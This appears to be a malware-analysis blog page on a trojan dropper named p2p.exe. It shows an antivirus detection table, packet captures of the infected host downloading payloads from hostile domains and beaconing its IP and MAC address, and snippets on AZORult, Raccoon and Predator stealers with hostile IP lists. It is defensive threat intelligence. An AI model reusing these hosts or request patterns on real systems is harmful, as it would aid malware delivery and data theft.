| SHA256: | ef794b9a3b72ae5524e17ecccf330eb16f2cc74f3e7fe7cb2667acefdea4b3a3 |
| File name: | p2p.exe |
| Detection ratio: | 47 / 55 |
| Analysis date: | 2016-10-26 21:33:06 UTC ( 0 minutes ago ) |
| Antivirus | Result | Update |
|---|---|---|
| AVG | Generic37.DEP | 20161026 |
| AVware | Trojan.Win32.Generic!BT | 20161026 |
| Ad-Aware | Gen:Trojan.Heur.fmKfXCDIycnj | 20161026 |
| AegisLab | Troj.Dropper.W32.Injector!c | 20161026 |
| AhnLab-V3 | Malware/Win32.Generic.N1843405561 | 20161026 |
| Antiy-AVL | Trojan[Dropper]/Win32.Injector | 20161026 |
| Arcabit | Trojan.Heur.fmKfXCDIycnj | 20161026 |
| Avast | Win32:Rofin-A [Trj] | 20161026 |
| Avira (no cloud) | TR/Crypt.FKM.Gen | 20161026 |
2016-10-25 23:20:18.175277 IP 192.168.1.102.61056 > 123.57.11.22.80: Flags [P.], seq 0:292, ack 1, win 256, length 292: HTTP: GET /YW/p2p/p2p.exe HTTP/1.1
E..L..@…._…f{9…..PZ.VX….P…….GET /YW/p2p/p2p.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.vcerror.com
Connection: Keep-Alive
2016-10-25 23:20:18.419780 IP 192.168.1.102.61056 > 123.57.11.22.80: Flags [.], ack 2921, win 256, length 0
E..(..@……..f{9…..PZ.W|..%uP….V……..
—
E..(..@….a…f{9…..PD.=…+.P…C………
2016-10-25 23:20:26.821311 IP 192.168.1.102.61057 > 123.57.11.22.80: Flags [P.], seq 0:103, ack 1, win 256, length 103: HTTP: GET /YW/p2p/ver.dat HTTP/1.1
E…..@……..f{9…..PD.=…+.P…Q…GET /YW/p2p/ver.dat HTTP/1.1
User-Agent: TestIE/1.0
Host: www.vcerror.com
Connection: Keep-Alive
2016-10-25 23:20:26.823460 IP 192.168.1.102.61058 > 13.107.21.200.443: Flags [.], ack 6157, win 32754, length 0
E..(s.@……..f.k……….kx.SP………….
2016-10-25 23:20:26.853146 IP 192.168.1.102.61058 > 13.107.21.200.443: Flags [.], ack 6754, win 32680, length 0
E..(s.@……..f.k……….kx..P………….
2016-10-25 23:20:27.116031 IP 192.168.1.102.61057 > 123.57.11.22.80: Flags [.], ack 318, win 255, length 0
—
E..(..@….]…f{9…..P….,…P…D;……..
2016-10-25 23:20:27.513843 IP 192.168.1.102.61059 > 123.57.11.22.80: Flags [P.], seq 0:304, ack 1, win 256, length 304: HTTP: GET /YW/config/config.bin?ver=3.180&lip=192.168.32.132&mac=000C29184A91 HTTP/1.1
E..X..@….,…f{9…..P….,…P…….GET /YW/config/config.bin?ver=3.180&lip=192.168.32.132&mac=000C29184A91 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: www.vcerror.com
Connection: Close
Cache-Control: no-cache
2016-10-25 23:20:27.850658 IP 192.168.1.102.61059 > 123.57.11.22.80: Flags [.], ack 1297, win 251, length 0
—
E..(..@….V…f{9…..P.~.k…[P….A……..
2016-10-25 23:20:30.265197 IP 192.168.1.102.61060 > 123.57.11.22.80: Flags [P.], seq 0:364, ack 1, win 256, length 364: HTTP: GET /YW/txt/hello.txt?ver=3.180&uid=config&lip=192.168.32.132&mac=000C29184A91&p=0&b=0.0.0.0.0&md5=64663066353033343933653362333835 HTTP/1.1
E…..@……..f{9…..P.~.k…[P…….GET /YW/txt/hello.txt?ver=3.180&uid=config&lip=192.168.32.132&mac=000C29184A91&p=0&b=0.0.0.0.0&md5=64663066353033343933653362333835 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: www.vcerror.com
Connection: Close
Cache-Control: no-cache
Written By
2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1 E....=@...wX . ...u-.N.P'&"i....P.@).Q..GET /zxcv.EXE HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozill...
AZORult/RacoonStealer can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. Raccoon is an info...
Predator the Thief is an information stealer, meaning that it is a malware that steals data from infected systems. This virus can access the camera and spy on victims, steal passwords and login information as well as retrieve payment data from cryptocurrency wallet...
Hostile IPs: 172.217.164.131 172.217.9.206 172.253.63.132 188.127.249.210 195.201.225.248 217.8.117.45 34.107.4.68 91.193.75.172 96.6.6.64 Dynamic Analysis Report Classification:DownloaderSpyware Threat Names:AZORult v3Gen:Varian...
